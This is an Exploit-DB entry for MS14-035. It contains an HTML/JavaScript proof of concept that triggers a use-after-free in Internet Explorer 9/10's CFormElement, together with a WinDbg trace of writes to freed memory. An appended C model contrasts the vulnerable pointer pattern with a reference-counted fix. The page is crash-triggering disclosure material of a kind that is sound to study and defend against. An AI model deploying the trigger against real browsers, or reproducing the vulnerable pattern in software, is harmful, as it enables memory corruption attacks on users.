Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)

Date: 08 Jul 2014 | Reported by: Drozdova Liudmila | Type: exploitdb | Source: www.exploit-db.com

Microsoft Internet Explorer CFormElement Use-After-Free / Memory Corruption (PoC)

Code
<!--
Exploit Title: MS14-035 Internet Explorer CFormElement Use-after-free and memory corruption POC (no crash! see trace)
Product: Internet Explorer
Vulnerable version: 9,10
Date: 8.07.2014
Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)
Vendor Homepage: http://www.microsoft.com/
Tested on: Windows 7 SP1 x86 IE 9,10
CVE : unknown
-->
<html>

<body>


<form id="form1">
   <input id="input1" type="text" value="">
</form>


<script>
    // Global flag so the handler only acts once the page has finished setting up.
    var loaded = false;

    // onclick handler: it runs from inside the native CInput::DoClick, and clearing
    // the body frees the parent CFormElement while DoClick still holds its pointer.
    function func() {
        if (loaded) {
            document.body.innerHTML = ""; // free CFormElement
        }
    }

    var input1 = document.getElementById("input1");
    input1.onclick = func;
    loaded = true;
    input1.click(); // Call DoClick function; after func() returns it writes to the freed CFormElement
</script>
</body>

</html>
<!--
Vulnerability details

MSHTML!CInput::DoClick

66943670 8bcf            mov     ecx,edi
66943672 ff751c          push    dword ptr [ebp+1Ch]
66943675 ff7518          push    dword ptr [ebp+18h]
66943678 ff7514          push    dword ptr [ebp+14h]
6694367b ff7510          push    dword ptr [ebp+10h]
6694367e ff750c          push    dword ptr [ebp+0Ch]
66943681 ff7508          push    dword ptr [ebp+8]  <---- esi = CFormElement
66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf) <--- call of func() in javascript, free esi
66943689 85db            test    ebx,ebx 
6694368b 7408            je      MSHTML!CInput::DoClick+0x74 (66943695)
6694368d 83666400        and     dword ptr [esi+64h],0 ds:0023:0034cd84=00000001 ; memory corruption, write to freed memory
66943691 836668fe        and     dword ptr [esi+68h],0FFFFFFFEh  ; memory corruption, write to freed memory

 MSHTML!CInput::DoClick+0x60:
66943681 ff7508          push    dword ptr [ebp+8]    ss:0023:023ec994=00000000
0:005> p
eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540
eip=66943684 esp=023ec95c ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x63:
66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf)
0:005> dds esi l1
0034cd20  6661ead8 MSHTML!CFormElement::`vftable'
0:005> !heap -x esi <-- esi contains valid pointer to CFormElement
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0034cd18  0034cd20  00270000  002fcee8        78      -            c  LFH;busy 

0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=66943689 esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
MSHTML!CInput::DoClick+0x68:
66943689 85db            test    ebx,ebx
0:005> dds esi l1
0034cd20  6661005c MSHTML!CSVGPathSegCurvetoCubicAbs::`vftable'+0x12c
0:005> !heap -x esi <-- esi contains freed pointer to CFormElement
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0034cd18  0034cd20  00270000  002fcee8        78      -            0  LFH;free 

0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368b esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x6a:
6694368b 7408            je      MSHTML!CInput::DoClick+0x74 (66943695)  [br=0]
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368d esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x6c:
6694368d 83666400        and     dword ptr [esi+64h],0 ds:0023:0034cd84=00000001
-->
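As an added example (not part of the exploit-db entry and not MSHTML's code), a constructed C model of the DoClick pattern the trace shows: the vulnerable shape keeps a raw pointer across the script callback, the hardened shape takes a reference before the callback and drops it afterwards, so the post-click write never lands on freed memory. All type and function names here are made up for the model.

```c
/* Constructed model of the CInput::DoClick pattern in the trace above: a
 * refcounted form element whose state words are updated after the click
 * handler ran. In the PoC the handler clears document.body, dropping the
 * form; DoClick then writes to [esi+64h]/[esi+68h] anyway. */
typedef struct FormElement {
    int refcount;   /* owners keeping the element alive */
    unsigned flags; /* stands in for the word at [esi+64h] */
    int freed;      /* model-only marker set when the last reference goes away */
} FormElement;
typedef void (*ClickHandler)(FormElement *form);

static void form_init(FormElement *f) {
    f->refcount = 1; /* the document's own reference */
    f->flags = 1;    /* matches the 00000001 read at [esi+64h] in the trace */
    f->freed = 0;
}
static void form_addref(FormElement *f) { f->refcount++; }
/* Instead of free(), flip a marker so a later access is detectable. */
static void form_release(FormElement *f) {
    if (--f->refcount == 0)
        f->freed = 1;
}
/* The post-click write ("and [esi+64h],0"). Returns 1 if it hit freed memory. */
static int set_click_state(FormElement *f) {
    if (f->freed)
        return 1;
    f->flags &= ~1u;
    return 0;
}
/* Vulnerable shape: raw pointer kept across a callback that may release it. */
static int doclick_vulnerable(FormElement *form, ClickHandler handler) {
    handler(form);                /* script runs here and may drop the form */
    return set_click_state(form); /* stale pointer write: use-after-free */
}
/* Hardened shape: hold a reference while script runs, release it after the last use. */
static int doclick_hardened(FormElement *form, ClickHandler handler) {
    form_addref(form);
    handler(form);                /* may drop the document's reference; ours remains */
    int uaf = set_click_state(form);
    form_release(form);           /* deferred teardown happens here, not mid-function */
    return uaf;
}
/* Handler standing in for func(): innerHTML = "" drops the document's reference. */
static void handler_frees_form(FormElement *form) { form_release(form); }
static void handler_noop(FormElement *form) { (void)form; }
```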
